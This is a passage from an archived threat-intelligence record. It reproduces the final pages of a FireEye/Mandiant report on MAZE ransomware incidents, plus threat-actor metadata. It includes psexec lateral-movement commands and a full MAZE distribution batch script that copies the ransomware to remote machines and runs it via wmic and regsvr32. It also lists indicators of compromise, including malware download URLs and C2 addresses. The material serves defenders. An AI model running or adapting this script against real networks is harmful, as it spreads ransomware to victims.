\"\u003cpassword\u003e\" -d -h -r rtrsd -s -accepteula -nobanne\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 19 of 26\n\nstart psexec.exe \\\\\u003cinternal IP\u003e -u \u003cDOMAIN\\adminaccount\u003e -p \"\u003cpassword\u003e\" -d -h -r rtrsd -s -accepteula -nobanne\r\nstart psexec.exe \\\\\u003cinternal IP\u003e -u \u003cDOMAIN\\adminaccount\u003e -p \"\u003cpassword\u003e\" -d -h -r rtrsd -s -accepteula -nobanne\r\nstart psexec.exe \\\\\u003cinternal IP\u003e -u \u003cDOMAIN\\adminaccount\u003e -p \"\u003cpassword\u003e\" -d -h -r rtrsd -s -accepteula -nobanne\r\nExample commands from MAZE distribution scripts\r\n@echo off\r\ndel done.txt\r\ndel offline.txt\r\nrem Loop thru list of computer names in file specified on command-line\r\nfor /f %%i in (%1) do call :check_machine %%i\r\ngoto end\r\n:check_machine\r\nrem Check to see if machine is up.\r\nping -n 1 %1|Find \"TTL=\" \u003eNUL 2\u003eNUL\r\nif errorlevel 1 goto down\r\necho %1\r\nSTART cmd /c \"copy [Location of MAZE binary] \\\\%1\\c$\\windows\\temp \u0026\u0026 exit\"\r\ntimeout 1 \u003e NUL\r\necho %1 \u003e\u003e done.txt\r\nrem wmic /node:\"%1\" process call create \"regsvr32.exe /i C:\\windows\\temp\\[MAZE binary name]\" \u003e\u003e done.txt\r\nSTART \"\" cmd /c \"wmic /node:\"%1\" process call create \"regsvr32.exe /i C:\\windows\\temp\\[MAZE binary name]\" \u0026\u0026 exi\r\ngoto end\r\n:down\r\n rem Report machine down\r\n echo %1 \u003e\u003e offline.txt\r\n:end\r\nExample MAZE distribution script\r\nIndicators of Compromise\r\nMaze Payloads\r\n \r\n064058cf092063a5b69ed8fd2a1a04fe\r\n0f841c6332c89eaa7cac14c9d5b1d35b\r\n108a298b4ed5b4e77541061f32e55751\r\n11308e450b1f17954f531122a56fae3b\r\n15d7dd126391b0e7963c562a6cf3992c\r\n21a563f958b73d453ad91e251b11855c\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 20 of 26\n\n27c5ecbb94b84c315d56673a851b6cf9\r\n2f78ff32cbb3c478865a88276248d419\r\n335aba8d135cc2e66549080ec9e8c8b7\r\n3bfcba2dd05e1c75f86c008f4d245f62\r\n46b98ee908d08f15137e509e5e69db1b\r\n5774f35d180c0702741a46d98190ff37\r\n5df79164b6d0661277f11691121b1d53\r\n658e9deec68cf5d33ee0779f54806cc2\r\n65cf08ffaf12e47de8cd37098aac5b33\r\n79d137d91be9819930eeb3876e4fbe79\r\n8045b3d2d4a6084f14618b028710ce85\r\n8205a1106ae91d0b0705992d61e84ab2\r\n83b8d994b989f6cbeea3e1a5d68ca5d8\r\n868d604146e7e5cb5995934b085846e3\r\n87239ce48fc8196a5ab66d8562f48f26\r\n89e1ddb8cc86c710ee068d6c6bf300f4\r\n910aa49813ee4cc7e4fa0074db5e454a\r\n9eb13d56c363df67490bcc2149229e4c\r\na0c5b4adbcd9eb6de9d32537b16c423b\r\na3a3495ae2fc83479baeaf1878e1ea84\r\nb02be7a336dcc6635172e0d6ec24c554\r\nb40a9eda37493425782bda4a3d9dad58\r\nb4d6cb4e52bb525ebe43349076a240df\r\nb6786f141148925010122819047d1882\r\nb93616a1ea4f4a131cc0507e6c789f94\r\nbd9838d84fd77205011e8b0c2bd711e0\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 21 of 26\n\nbe537a66d01c67076c8491b05866c894\r\nbf2e43ff8542e73c1b27291e0df06afd\r\nc3ce5e8075f506e396ee601f2757a2bd\r\nd2dda72ff2fbbb89bd871c5fc21ee96a\r\nd3eaab616883fcf51dcbdb4769dd86df\r\nd552be44a11d831e874e05cadafe04b6\r\ndeebbea18401e8b5e83c410c6d3a8b4e\r\ndfa4631ec2b8459b1041168b1b1d5105\r\ne57ba11045a4b7bc30bd2d33498ef194\r\ne69a8eb94f65480980deaf1ff5a431a6\r\nef95c48e750c1a3b1af8f5446fa04f54\r\nf04d404d84be66e64a584d425844b926\r\nf457bb5060543db3146291d8c9ad1001\r\nf5ecda7dd8bb1c514f93c09cea8ae00d\r\nf83cef2bf33a4d43e58b771e81af3ecc\r\nfba4cbb7167176990d5a8d24e9505f71\r\nMaze Check-in IPs 91.218.114.11\r\n91.218.114.25\r\n91.218.114.26\r\n91.218.114.31\r\n91.218.114.32\r\n91.218.114.37\r\n91.218.114.38\r\n91.218.114.4\r\n91.218.114.77\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 22 of 26\n\n91.218.114.79\r\n92.63.11.151\r\n92.63.15.6 \r\n92.63.15.8 \r\n92.63.17.245\r\n92.63.194.20\r\n92.63.194.3\r\n92.63.29.137\r\n92.63.32.2 \r\n92.63.32.52\r\n92.63.32.55\r\n92.63.32.57\r\n92.63.37.100\r\n92.63.8.47\r\nMaze-related Domains\r\naoacugmutagkwctu[.]onion\r\nmazedecrypt[.]top \r\nmazenews[.]top\r\nnewsmaze[.]top\r\nMaze Download URLs http://104.168.174.32/wordupd_3.0.1.tmp\r\nhttp://104.168.198.208/wordupd.tmp\r\nhttp://104.168.201.35/dospizdos.tmp\r\nhttp://104.168.201.47/wordupd.tmp\r\nhttp://104.168.215.54/wordupd.tmp\r\nhttp://149.56.245.196/wordupd.tmp\r\nhttp://192.119.106.235/mswordupd.tmp\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 23 of 26\n\nhttp://192.119.106.235/officeupd.tmp\r\nhttp://192.99.172.143/winupd.tmp\r\nhttp://54.39.233.188/win163.65.tmp\r\nhttp://91.208.184.174:8079/windef.exe\r\nhttp://agenziainformazioni[.]icu/wordupd.tmp\r\nhttp://www.download-invoice[.]site/Invoice_29557473.exe\r\nMalicious Documents\r\n1a26c9b6ba40e4e3c3dce12de266ae10\r\n53d5bdc6bd7904b44078cf80e239d42b\r\n79271dc08052480a578d583a298951c5\r\na2d631fcb08a6c840c23a8f46f6892dd\r\nad30987a53b1b0264d806805ce1a2561\r\nc09af442e8c808c953f4fa461956a30f\r\nee26e33725b14850b1776a67bd8f2d0a\r\nBEACON C2s\r\n173.209.43.61\r\n193.36.237.173\r\n37.1.213.9\r\n37.252.7.142\r\n5.199.167.188\r\nchecksoffice[.]me\r\ndrivers.updatecenter[.]icu\r\nplaintsotherest[.]net\r\nthesawmeinrew[.]net\r\nupdates.updatecenter[.]icu\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 24 of 26\n\nCobalt Strike Binaries\r\n7507fe19afbda652e9b2768c10ad639f\r\na93b86b2530cc988f801462ead702d84\r\n4f57e35a89e257952c3809211bef78ea\r\nbad6fc87a98d1663be0df23aedaf1c62\r\nf5ef96251f183f7fc63205d8ebf30cbf\r\nc818cc38f46c604f8576118f12fd0a63\r\n078cf6db38725c37030c79ef73519c0c\r\nc255daaa8abfadc12c9ae8ae2d148b31\r\n1fef99f05bf5ae78a28d521612506057\r\ncebe4799b6aff9cead533536b09fecd1\r\n4ccca6ff9b667a01df55326fcc850219\r\nbad6fc87a98d1663be0df23aedaf1c62\r\nMeterpreter C2s 5.199.167.188\r\nOther Related Files\r\n3A5A9D40D4592C344920DD082029B362 (related script)\r\n76f8f28bd51efa03ab992fdb050c8382 (MAZE execution artifact)\r\nb5aa49c1bf4179452a85862ade3ef317 (windows.bat kill script) \r\nfad3c6914d798e29a3fd8e415f1608f4 (related script)\r\nTools \u0026 Utilities\r\n27304b246c7d5b4e149124d5f93c5b01 (PsExec)\r\n42badc1d2f03a8b1e4875740d3d49336 (7zip)\r\n75b55bb34dac9d02740b9ad6b6820360 (PsExec)\r\n9b02dd2a1a15e94922be3f85129083ac (AdFind)\r\nc621a9f931e4ebf37dace74efcce11f2 (SMBTools)\r\nf413b4a2242bb60829c9a470eea4dfb6 (winRAR) \r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 25 of 26\n\nEmail Sender Domains\r\natt-customer[.]com\r\natt-information[.]com\r\natt-newsroom[.]com\r\natt-plans[.]com\r\nbezahlen-1und1[.]icu\r\nbzst-info[.]icu\r\nbzst-inform[.]icu\r\nbzstinfo[.]icu\r\nbzstinform[.]icu\r\ncanada-post[.]icu\r\ncanadapost-delivery[.]icu\r\ncanadapost-tracking[.]icu\r\nhilfe-center-1und1[.]icu\r\nhilfe-center-internetag[.]icu\r\ntrackweb-canadapost[.]icu\r\nSender Domain Registrant Addresses\r\nabusereceive@hitler.rocks\r\ngladkoff1991@yandex.ru\r\nMandiant Threat Intelligence will host an exclusive webinar on Thursday, May 21, 2020, at 8 a.m. PT / 11 a.m. ET\r\nto provide updated insight and information into the MAZE ransomware threat, and to answer questions from\r\nattendees. Register today to reserve your spot.\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 26 of 26", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA", "MITRE" ], "references": [ "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html" ], "report_names": [ "tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html" ], "threat_actors": [ { "id": "12517c87-040a-4627-a3df-86ca95e5c13f", "created_at": "2022-10-25T16:07:23.61665Z", "updated_at": "2026-04-10T02:00:04.689Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "ATK 88", "Camouflage Tempest", "FIN6", "G0037", "Gold Franklin", "ITG08", "Skeleton Spider", "Storm-0538", "TAAL", "TAG-CR2", "White Giant" ], "source_name": "ETDA:FIN6", "tools": [ "AbaddonPOS", "Agentemis", "AmmyyRAT", "Anchor_DNS", "BlackPOS", "CmdSQL", "Cobalt Strike", "CobaltStrike", "FlawedAmmyy", "FrameworkPOS", "Grateful POS", "JSPSPY", "Kaptoxa", "LOLBAS", "LOLBins", "Living off the Land", "LockerGoga", "MMon", "Magecart", "Meterpreter", "Mimikatz", "More_eggs", "NeverQuest", "POSWDS", "Reedum", "Ryuk", "SCRAPMINT", "SONE", "SpicyOmelette", "StealerOne", "Taurus Loader Stealer Module", "Terra Loader", "TerraStealer", "Vawtrak", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "cobeacon", "grabnew" ], "source_id": "ETDA", "reports": null }, { "id": "cf7fc640-acfe-41c4-9f3d-5515d53a3ffb", "created_at": "2023-01-06T13:46:38.228042Z", "updated_at": "2026-04-10T02:00:02.883048Z", "deleted_at": null, "main_name": "APT1", "aliases": [ "PLA Unit 61398", "Comment Crew", "Byzantine Candor", "Comment Group", "GIF89a", "Group 3", "TG-8223", "Brown Fox", "ShadyRAT", "G0006", "COMMENT PANDA" ], "source_name": "MISPGALAXY:APT1", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ea7bfe06-7c23-481d-b8ba-eafa6cda3bc9", "created_at": "2022-10-25T15:50:23.317961Z", "updated_at": "2026-04-10T02:00:05.280403Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "FIN6", "Magecart Group 6", "ITG08", "Skeleton Spider", "TAAL", "Camouflage Tempest" ], "source_name": "MITRE:FIN6", "tools": [ "FlawedAmmyy", "GrimAgent", "FrameworkPOS", "More_eggs", "Cobalt Strike", "Windows Credential Editor", "AdFind", "PsExec", "LockerGoga", "Ryuk", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "b3acfb48-b04d-4d3d-88a8-836d7376fa2e", "created_at": "2024-06-19T02:03:08.052814Z", "updated_at": "2026-04-10T02:00:03.659971Z", "deleted_at": null, "main_name": "GOLD FRANKLIN", "aliases": [ "FIN6 ", "ITG08 ", "MageCart Group 6 ", "Skeleton Spider ", "Storm-0538 ", "White Giant " ], "source_name": "Secureworks:GOLD FRANKLIN", "tools": [ "FrameWorkPOS", "Metasploit", "Meterpreter", "Mimikatz", "PowerSploit", "PowerUpSQL", "RemCom" ], "source_id": "Secureworks", "reports": null }, { "id": "ee3363a4-e807-4f95-97d8-b603c31b9de1", "created_at": "2023-01-06T13:46:38.485884Z", "updated_at": "2026-04-10T02:00:02.99385Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "SKELETON SPIDER", "ITG08", "MageCart Group 6", "ATK88", "TA4557", "Storm-0538", "White Giant", "GOLD FRANKLIN", "G0037", "Camouflage Tempest" ], "source_name": "MISPGALAXY:FIN6", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3aaf0755-5c9b-4612-9f0e-e266ef1bdb4b", "created_at": "2022-10-25T16:07:23.480196Z", "updated_at": "2026-04-10T02:00:04.626125Z", "deleted_at": null, "main_name": "Comment Crew", "aliases": [ "APT 1", "BrownFox", "Byzantine Candor", "Byzantine Hades", "Comment Crew", "Comment Panda", "G0006", "GIF89a", "Group 3", "Operation Oceansalt", "Operation Seasalt", "Operation Siesta", "Shanghai Group", "TG-8223" ], "source_name": "ETDA:Comment Crew", "tools": [ "Auriga", "Cachedump", "Chymine", "CookieBag", "Darkmoon", "GDOCUPLOAD", "GLOOXMAIL", "GREENCAT", "Gen:Trojan.Heur.PT", "GetMail", "Hackfase", "Hacksfase", "Helauto", "Kurton", "LETSGO", "LIGHTBOLT", "LIGHTDART", "LOLBAS", "LOLBins", "LONGRUN", "Living off the Land", "Lslsass", "MAPIget", "ManItsMe", "Mimikatz", "MiniASP", "Oceansalt", "Pass-The-Hash Toolkit", "Poison Ivy", "ProcDump", "Riodrv", "SPIVY", "Seasalt", "ShadyRAT", "StarsyPound", "TROJAN.COOKIES", "TROJAN.FOXY", "TabMsgSQL", "Tarsip", "Trojan.GTALK", "WebC2", "WebC2-AdSpace", "WebC2-Ausov", "WebC2-Bolid", "WebC2-Cson", "WebC2-DIV", "WebC2-GreenCat", "WebC2-Head", "WebC2-Kt3", "WebC2-Qbp", "WebC2-Rave", "WebC2-Table", "WebC2-UGX", "WebC2-Yahoo", "Wordpress Bruteforcer", "bangat", "gsecdump", "pivy", "poisonivy", "pwdump", "zxdosml" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434694, "ts_updated_at": 1775792289, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/82399333ab6ed280ea6f85aab99c3c267f3dec98.pdf", "text": "https://archive.orkl.eu/82399333ab6ed280ea6f85aab99c3c267f3dec98.txt", "img": "https://archive.orkl.eu/82399333ab6ed280ea6f85aab99c3c267f3dec98.jpg" } }